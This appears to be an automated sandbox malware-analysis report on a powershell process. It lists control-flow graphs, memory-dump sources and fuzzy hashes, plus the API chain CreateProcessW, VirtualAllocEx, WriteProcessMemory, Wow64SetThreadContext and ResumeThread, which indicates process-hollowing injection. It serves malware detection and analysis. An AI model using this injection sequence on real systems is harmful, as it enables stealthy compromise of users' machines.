                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 8ffd8af31297d47fded7cac54d83aee16d57e0b1327a10cf101767841be0e355
                                                                                                                                                                      • Instruction ID: 5a7715f00bb2733acdc140098a7f3d651bbf2bba40112b8ae7aab983a238dc84
                                                                                                                                                                      • Opcode Fuzzy Hash: 8ffd8af31297d47fded7cac54d83aee16d57e0b1327a10cf101767841be0e355
                                                                                                                                                                      • Instruction Fuzzy Hash: D4F06271504244EFE7108E15CCC4BA2FBD8EB95764F18C55AED485B286C3799C84CAB1

                                                                                                                                                                      Execution Graph

                                                                                                                                                                      Execution Coverage:11.8%
                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                                      Total number of Nodes:27
                                                                                                                                                                      Total number of Limit Nodes:4
                                                                                                                                                                      execution_graph 5786 2573a0 5787 2573f0 WriteProcessMemory 5786->5787 5788 2573e8 5786->5788 5789 25742b 5787->5789 5788->5787 5790 254b40 5792 254b53 5790->5792 5791 254b94 5792->5791 5794 255df0 5792->5794 5795 255e09 5794->5795 5796 255e61 5795->5796 5801 256126 VirtualAllocEx 5795->5801 5803 256508 ResumeThread 5795->5803 5805 2565b8 5795->5805 5809 256768 VirtualAllocEx 5795->5809 5796->5792 5802 255f31 5801->5802 5802->5795 5804 255f31 5803->5804 5804->5795 5806 2565c6 5805->5806 5807 256508 ResumeThread 5806->5807 5808 255f31 5806->5808 5807->5808 5808->5795 5810 255f31 5809->5810 5810->5795 5811 257228 5812 257274 Wow64SetThreadContext 5811->5812 5813 25726a 5811->5813 5814 2572a2 5812->5814 5813->5812 5815 256fe8 5816 257063 CreateProcessW 5815->5816 5818 257141 5816->5818

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 0 250f68-250fbc 3 25101c-25103b 0->3 4 250fbe-257061 0->4 7 257063-257066 4->7 8 257069-257070 4->8 7->8 10 257072-257078 8->10 11 25707b-257091 8->11 10->11 12 257093-257099 11->12 13 25709c-25713f CreateProcessW 11->13 12->13 16 257141-257147 13->16 17 257148-2571c0 13->17 16->17 24 2571d2-2571d9 17->24 25 2571c2-2571c8 17->25 26 2571f0 24->26 27 2571db-2571ea 24->27 25->24 28 2571f1 26->28 27->26 28->28
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.486171909.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_250000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 0968109b277e1b73fac92b24bac7c02e757079e28041fa0aff393ff83d30cffb
                                                                                                                                                                      • Instruction ID: b35cda8be816589b6ae8b4f346cb51c1538dabc1b94e83a47955361c4133c83e
                                                                                                                                                                      • Opcode Fuzzy Hash: 0968109b277e1b73fac92b24bac7c02e757079e28041fa0aff393ff83d30cffb
                                                                                                                                                                      • Instruction Fuzzy Hash: 2BE1AC7181E3858FDB128F64C8647D9BFB0AF07251F0981D7D888EB1A3D6384D59CB66

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 30 390a5d-390a60 31 390a62-390a64 30->31 32 390a66-390a6e 30->32 31->32 33 390a70-390a76 32->33 34 390a86-390a8a 32->34 37 390a78 33->37 38 390a7a-390a84 33->38 35 390beb-390bf5 34->35 36 390a90-390a94 34->36 39 390c03-390c09 35->39 40 390bf7-390c01 35->40 41 390aa7 36->41 42 390a96-390aa5 36->42 37->34 38->34 44 390c0b-390c0d 39->44 45 390c0f-390c1b 39->45 40->39 46 390aa9-390aab 41->46 42->46 47 390c1d-390c3b 44->47 45->47 46->35 48 390ab1-390ad1 46->48 54 390af0 48->54 55 390ad3-390aee 48->55 56 390af2-390af4 54->56 55->56 56->35 57 390afa-390afc 56->57 59 390b0c 57->59 60 390afe-390b0a 57->60 62 390b0e-390b10 59->62 60->62 62->35 63 390b16-390b36 62->63 66 390b38-390b3e 63->66 67 390b4e-390b52 63->67 70 390b40 66->70 71 390b42-390b44 66->71 68 390b6c-390b70 67->68 69 390b54-390b5a 67->69 74 390b77-390b79 68->74 72 390b5c 69->72 73 390b5e-390b6a 69->73 70->67 71->67 72->68 73->68 76 390b7b-390b81 74->76 77 390b91-390be9 74->77 78 390b83 76->78 79 390b85-390b87 76->79 77->35 78->77 79->77
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.486233315.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_390000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: h<2$h<2
                                                                                                                                                                      • API String ID: 0-1608284994
                                                                                                                                                                      • Opcode ID: e72cb0b720cc616b547c223bef7e039231605e3f9f06fe546e4d7cdf1fbb4660
                                                                                                                                                                      • Instruction ID: db42d7798891e654530834f68600b37fdda03809f8c66cbfb6eed07ec15b8bf7
                                                                                                                                                                      • Opcode Fuzzy Hash: e72cb0b720cc616b547c223bef7e039231605e3f9f06fe546e4d7cdf1fbb4660
                                                                                                                                                                      • Instruction Fuzzy Hash: D541F235704301CFDF2F5A34986067BB7A6AF80325F258476C855DB292DA76CD81CBA2

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 81 256bd4-257061 85 257063-257066 81->85 86 257069-257070 81->86 85->86 87 257072-257078 86->87 88 25707b-257091 86->88 87->88 89 257093-257099 88->89 90 25709c-25713f CreateProcessW 88->90 89->90 93 257141-257147 90->93 94 257148-2571c0 90->94 93->94 101 2571d2-2571d9 94->101 102 2571c2-2571c8 94->102 103 2571f0 101->103 104 2571db-2571ea 101->104 102->101 105 2571f1 103->105 104->103 105->105
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000009,?,?,?,?,?,?,?), ref: 0025712C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.486171909.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_250000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateProcess
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 963392458-0
                                                                                                                                                                      • Opcode ID: 62b11d012bdaf5553b61d62de9455447fe17510ccf3170328f970898e0cc321a
                                                                                                                                                                      • Instruction ID: ce26335de594ff5684118393ded078fa2134fd46289e25c268919794a1beaec8
                                                                                                                                                                      • Opcode Fuzzy Hash: 62b11d012bdaf5553b61d62de9455447fe17510ccf3170328f970898e0cc321a
                                                                                                                                                                      • Instruction Fuzzy Hash: C0619C7180529ACFDB11CFA9CC94BDDBBB1AF09304F0484EAD949BB251D7749A89CF60

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 107 250d18-257061 111 257063-257066 107->111 112 257069-257070 107->112 111->112 113 257072-257078 112->113 114 25707b-257091 112->114 113->114 115 257093-257099 114->115 116 25709c-25713f CreateProcessW 114->116 115->116 119 257141-257147 116->119 120 257148-2571c0 116->120 119->120 127 2571d2-2571d9 120->127 128 2571c2-2571c8 120->128 129 2571f0 127->129 130 2571db-2571ea 127->130 128->127 131 2571f1 129->131 130->129 131->131
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000009,?,?,?,?,?,?,?), ref: 0025712C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.486171909.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_250000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateProcess
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 963392458-0
                                                                                                                                                                      • Opcode ID: 3f489464cb298bb2b3449784cfdbe99ac8cbcfa9319a82b192347cc90b55da83
                                                                                                                                                                      • Instruction ID: e80832be60a63d226ae6f9a7778913e0da5da792a7dacad6bc31e84d67c23850
                                                                                                                                                                      • Opcode Fuzzy Hash: 3f489464cb298bb2b3449784cfdbe99ac8cbcfa9319a82b192347cc90b55da83
                                                                                                                                                                      • Instruction Fuzzy Hash: 1C518B71D11259CFEB25CFA9C894BDDBBB1BF48305F14809AE808BB250D7719A88CF60

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 133 250ec3-257061 135 257063-257066 133->135 136 257069-257070 133->136 135->136 137 257072-257078 136->137 138 25707b-257091 136->138 137->138 139 257093-257099 138->139 140 25709c-25713f CreateProcessW 138->140 139->140 143 257141-257147 140->143 144 257148-2571c0 140->144 143->144 151 2571d2-2571d9 144->151 152 2571c2-2571c8 144->152 153 2571f0 151->153 154 2571db-2571ea 151->154 152->151 155 2571f1 153->155 154->153 155->155
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000009,?,?,?,?,?,?,?), ref: 0025712C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.486171909.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_250000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateProcess
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 963392458-0
                                                                                                                                                                      • Opcode ID: f75a4ea6dafc2047e1d50ebdd39048e20a56d9ce08a2e06ef4783457ff20ab80
                                                                                                                                                                      • Instruction ID: f0918b77cd21f65f28d0ac7be16548c8ea2a38bb395b9a9b43325788036bc8a8
                                                                                                                                                                      • Opcode Fuzzy Hash: f75a4ea6dafc2047e1d50ebdd39048e20a56d9ce08a2e06ef4783457ff20ab80
                                                                                                                                                                      • Instruction Fuzzy Hash: 9F514671D11219DFEB24CFA9C884BDDBBB1BF48304F1485AAE909B7250D7719A89CF60

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 157 250f8d-257061 159 257063-257066 157->159 160 257069-257070 157->160 159->160 161 257072-257078 160->161 162 25707b-257091 160->162 161->162 163 257093-257099 162->163 164 25709c-25713f CreateProcessW 162->164 163->164 167 257141-257147 164->167 168 257148-2571c0 164->168 167->168 175 2571d2-2571d9 168->175 176 2571c2-2571c8 168->176 177 2571f0 175->177 178 2571db-2571ea 175->178 176->175 179 2571f1 177->179 178->177 179->179
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000009,?,?,?,?,?,?,?), ref: 0025712C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.486171909.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_250000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateProcess
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 963392458-0
                                                                                                                                                                      • Opcode ID: 10633d55495364ce34d0003fc7c99e38c32ec8f545f11cabeccddc14f766d43e
                                                                                                                                                                      • Instruction ID: e11e8ae1d85308c646e378f956d9b0335f8c4270b8581ddc739e276da2588797
                                                                                                                                                                      • Opcode Fuzzy Hash: 10633d55495364ce34d0003fc7c99e38c32ec8f545f11cabeccddc14f766d43e
                                                                                                                                                                      • Instruction Fuzzy Hash: CD518971D01259DFEB21CFA9C880BDDBBB1BF48304F1481AAE809B7250D7319A89CF60

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 181 250fa8-257061 185 257063-257066 181->185 186 257069-257070 181->186 185->186 187 257072-257078 186->187 188 25707b-257091 186->188 187->188 189 257093-257099 188->189 190 25709c-25713f CreateProcessW 188->190 189->190 193 257141-257147 190->193 194 257148-2571c0 190->194 193->194 201 2571d2-2571d9 194->201 202 2571c2-2571c8 194->202 203 2571f0 201->203 204 2571db-2571ea 201->204 202->201 205 2571f1 203->205 204->203 205->205
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000009,?,?,?,?,?,?,?), ref: 0025712C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.486171909.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_250000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateProcess
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 963392458-0
                                                                                                                                                                      • Opcode ID: db6e3feb3ad0793111ffdfee43ae64e8299b8b1e747c0df39b6f6913176b7a1b
                                                                                                                                                                      • Instruction ID: 2ad8ad5c5030ad7bcfe97f9fad1c4da4e1e651d36469acb874fa72adb24feee7
                                                                                                                                                                      • Opcode Fuzzy Hash: db6e3feb3ad0793111ffdfee43ae64e8299b8b1e747c0df39b6f6913176b7a1b
                                                                                                                                                                      • Instruction Fuzzy Hash: A4517A71C15259DFEB21CF69C894BDDBBB1AF48304F1484EAE809B7250D7759A88CF60

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 207 256fe8-257061 208 257063-257066 207->208 209 257069-257070 207->209 208->209 210 257072-257078 209->210 211 25707b-257091 209->211 210->211 212 257093-257099 211->212 213 25709c-25713f CreateProcessW 211->213 212->213 216 257141-257147 213->216 217 257148-2571c0 213->217 216->217 224 2571d2-2571d9 217->224 225 2571c2-2571c8 217->225 226 2571f0 224->226 227 2571db-2571ea 224->227 225->224 228 2571f1 226->228 227->226 228->228
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000009,?,?,?,?,?,?,?), ref: 0025712C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.486171909.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_250000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateProcess
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 963392458-0
                                                                                                                                                                      • Opcode ID: cfbef27d4fdffe697d4bec72bfed8cdd992c7f1f9129341ebefedaa6f7b17594
                                                                                                                                                                      • Instruction ID: 7b359fee740a90990402a898f34dceddeefeaeeb3a9798df2cdbbcc95e982097
                                                                                                                                                                      • Opcode Fuzzy Hash: cfbef27d4fdffe697d4bec72bfed8cdd992c7f1f9129341ebefedaa6f7b17594
                                                                                                                                                                      • Instruction Fuzzy Hash: A251357191021ADFEB24CF99C884BDDBBB5BF48304F1485AAE909B7250D7719A88CF60

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 230 2510d3-25713f CreateProcessW 232 257141-257147 230->232 233 257148-2571c0 230->233 232->233 240 2571d2-2571d9 233->240 241 2571c2-2571c8 233->241 242 2571f0 240->242 243 2571db-2571ea 240->243 241->240 244 2571f1 242->244 243->242 244->244
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000009,?,?,?,?,?,?,?), ref: 0025712C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.486171909.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_250000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateProcess
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 963392458-0
                                                                                                                                                                      • Opcode ID: dbb071e4c3e021ed6674525a3f2f1b16b630e1c6ea02f10e1c1f16f16dbcc587
                                                                                                                                                                      • Instruction ID: 499f882997cb70cf6d269408cb8d488c939fb8debd7a473509f4726f71a3c345
                                                                                                                                                                      • Opcode Fuzzy Hash: dbb071e4c3e021ed6674525a3f2f1b16b630e1c6ea02f10e1c1f16f16dbcc587
                                                                                                                                                                      • Instruction Fuzzy Hash: A1211571810219DFEF25CF98CD44BDDBBB2AF48309F148595E908B7250CB719A99CF60

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 246 251215-257268 248 257274-2572a0 Wow64SetThreadContext 246->248 249 25726a-257272 246->249 250 2572a2-2572a8 248->250 251 2572a9-2572ca 248->251 249->248 250->251
                                                                                                                                                                      APIs
                                                                                                                                                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00257293
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.486171909.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_250000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ContextThreadWow64
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 983334009-0
                                                                                                                                                                      • Opcode ID: 718f37f1f4a94c5b4225f862949e57101cfe3311c0a6370af44434577f5ef7c5
                                                                                                                                                                      • Instruction ID: 53faf022c5edb31cba17a5dab16c1f79b540f46c9b8b1a72314fbcc681874a86
                                                                                                                                                                      • Opcode Fuzzy Hash: 718f37f1f4a94c5b4225f862949e57101cfe3311c0a6370af44434577f5ef7c5
                                                                                                                                                                      • Instruction Fuzzy Hash: 732149B1D142498FDB10CFAAD884BDEBFF0AF89310F15846AD854E7251D3789549CF61

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 259 2573a0-2573e6 260 2573f0-257429 WriteProcessMemory 259->260 261 2573e8-2573ee 259->261 262 257432-257453 260->262 263 25742b-257431 260->263 261->260 263->262
                                                                                                                                                                      APIs
                                                                                                                                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0025741C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.486171909.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_250000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MemoryProcessWrite
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3559483778-0
                                                                                                                                                                      • Opcode ID: 447d3ce8b071e0ff663ee33c5271c3d46bf9441059fe2f8cfabc6b0a5028224b
                                                                                                                                                                      • Instruction ID: 856c3e447371cf8d29c88b07b835bd76a2f1de0ec23ab7fe9fcd7a66fe77d953
                                                                                                                                                                      • Opcode Fuzzy Hash: 447d3ce8b071e0ff663ee33c5271c3d46bf9441059fe2f8cfabc6b0a5028224b
                                                                                                                                                                      • Instruction Fuzzy Hash: 4F2115B1910349DFDB10CF9AD884BDEBBF4FB48310F10842AE918A7200D378AA44CBA5

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 253 25739e-2573e6 254 2573f0-257429 WriteProcessMemory 253->254 255 2573e8-2573ee 253->255 256 257432-257453 254->256 257 25742b-257431 254->257 255->254 257->256
                                                                                                                                                                      APIs
                                                                                                                                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0025741C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.486171909.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_250000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MemoryProcessWrite
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3559483778-0
                                                                                                                                                                      • Opcode ID: e9711c79ab5124a97b54b7722b713b07fd3cfeccffc0b0295da50fb2b45b7995
                                                                                                                                                                      • Instruction ID: 61a5687a0e4cf55b6d139d4ec3a60e674736067517a84f1df7662688622b4f3f
                                                                                                                                                                      • Opcode Fuzzy Hash: e9711c79ab5124a97b54b7722b713b07fd3cfeccffc0b0295da50fb2b45b7995
                                                                                                                                                                      • Instruction Fuzzy Hash: 082115B1910249DFDB10CFA9D884BDEBBF4FF48310F14842AE818A7200C3789A44CF64

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 265 257220-257268 266 257274-2572a0 Wow64SetThreadContext 265->266 267 25726a-257272 265->267 268 2572a2-2572a8 266->268 269 2572a9-2572ca 266->269 267->266 268->269
                                                                                                                                                                      APIs
                                                                                                                                                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00257293
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.486171909.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_250000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ContextThreadWow64
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 983334009-0
                                                                                                                                                                      • Opcode ID: 557a8f96a1da696463d019b8efdeea59fd2069007c7eb43e9e7cb92c6192b07b
                                                                                                                                                                      • Instruction ID: 889cbc56ea2abb4ac86ce76c20d1f46d30965b5139cd60ebba00b0de96429856
                                                                                                                                                                      • Opcode Fuzzy Hash: 557a8f96a1da696463d019b8efdeea59fd2069007c7eb43e9e7cb92c6192b07b
                                                                                                                                                                      • Instruction Fuzzy Hash: BA1159B1D106498FDB10CFAAD884BDEFBF0EF89310F148529D858A3240D3789945CF64

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 271 257228-257268 272 257274-2572a0 Wow64SetThreadContext 271->272 273 25726a-257272 271->273 274 2572a2-2572a8 272->274 275 2572a9-2572ca 272->275 273->272 274->275
                                                                                                                                                                      APIs
                                                                                                                                                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00257293
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.486171909.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_250000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ContextThreadWow64
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 983334009-0
                                                                                                                                                                      • Opcode ID: 96e5287a6bc48b5476a58d93226a1300b1e3f9a45ab9e10c628202a1abe1a749
                                                                                                                                                                      • Instruction ID: eb215ba5f86eddde406b142462bdebf9f5a032d0bfddf5a13bdf0e78d2853489
                                                                                                                                                                      • Opcode Fuzzy Hash: 96e5287a6bc48b5476a58d93226a1300b1e3f9a45ab9e10c628202a1abe1a749
                                                                                                                                                                      • Instruction Fuzzy Hash: 371119B1D102498FDB10CF9AD884BDEFBF4EB89310F148529D858A7250D378A545CFA5

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 277 2565b8-2565c8 call 25182c 280 2565ce-2565dc 277->280 281 256508-256546 ResumeThread 277->281 284 2565e2-2565e5 280->284 285 255fad-255fb0 280->285 282 25654f-25655c 281->282 283 256548-25654e 281->283 286 256562-256573 282->286 287 256a5b-256a62 282->287 283->282 284->285 288 255fb6-256845 285->288 289 2568b0-2568b9 285->289 286->285 293 256579-25657c 286->293 288->285 295 25684b-25684e 288->295 290 2568bf-2568d2 289->290 291 256968-256988 289->291 290->285 290->291 300 256993-256996 291->300 301 25698a-25698f 291->301 293->285 295->285 303 2569b3-2569ca 300->303 304 256998 300->304 302 256991 301->302 302->300 303->300 313 2569cc 303->313 304->303 305 25699f-2569ad 304->305 306 2569ce-2569d7 304->306 307 2569f8-2569fd 304->307 305->300 308 2569af-2569b1 305->308 310 2569ff-256a21 306->310 311 2569d9-2569e3 306->311 315 256a2f-256ab0 307->315 308->300 319 256a27-256a2a 310->319 320 255f31-255f34 310->320 317 2569e5-2569ea 311->317 318 2569ec call 254a98 311->318 313->300 317->300 326 2569f1-2569f6 318->326 319->315 319->320 322 256a34-256a4d 320->322 323 255f3a 320->323 322->320 325 256a53-256a56 322->325 323->302 325->320 326->302 326->307
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.486171909.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_250000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ResumeThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 947044025-0
                                                                                                                                                                      • Opcode ID: 5dbb4446f8d2be6ee4810170fbbad959ed1e616acf4ddf080cbd1e8ce640836e
                                                                                                                                                                      • Instruction ID: 9d53dd93c01b812e78e6fa1985c7cea1655e06fa20d7f9ba880e7345d7f140c3
                                                                                                                                                                      • Opcode Fuzzy Hash: 5dbb4446f8d2be6ee4810170fbbad959ed1e616acf4ddf080cbd1e8ce640836e
                                                                                                                                                                      • Instruction Fuzzy Hash: F211D230920215CFDB20CF54D95CBA877B1BB45316F6081C5E8086B6A5D3709DDDCF16
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.486171909.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_250000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ResumeThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 947044025-0
                                                                                                                                                                      • Opcode ID: 7e644b399e987a3772a9d8e9c94e26e614806e13d7510fe655e37854c48c3130
                                                                                                                                                                      • Instruction ID: 14afef56ca2148161c9dfe96f117b6e9fba911b99d7274436769aa72c9c1db14
                                                                                                                                                                      • Opcode Fuzzy Hash: 7e644b399e987a3772a9d8e9c94e26e614806e13d7510fe655e37854c48c3130
                                                                                                                                                                      • Instruction Fuzzy Hash: 36018C30924214CFEB20CF94D99C798BBB1AB4531AF6081CAE8086B6A5C7744ADDCF16
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.486233315.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_390000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 191d44ff48b81ff5ddb272a1c4d01b8b8c740aad37b3a519ea69bdd9d8429dee
                                                                                                                                                                      • Instruction ID: f58c9f0555437a45e9c23939ee80532d6eb0809044bbd7a4f52d91662bbeefda
                                                                                                                                                                      • Opcode Fuzzy Hash: 191d44ff48b81ff5ddb272a1c4d01b8b8c740aad37b3a519ea69bdd9d8429dee
                                                                                                                                                                      • Instruction Fuzzy Hash: 7E41E830A09391EFCB239B74C860A6ABFB1AF46311F1AC0DAD5449F2A3C7759C46C761
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.486233315.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
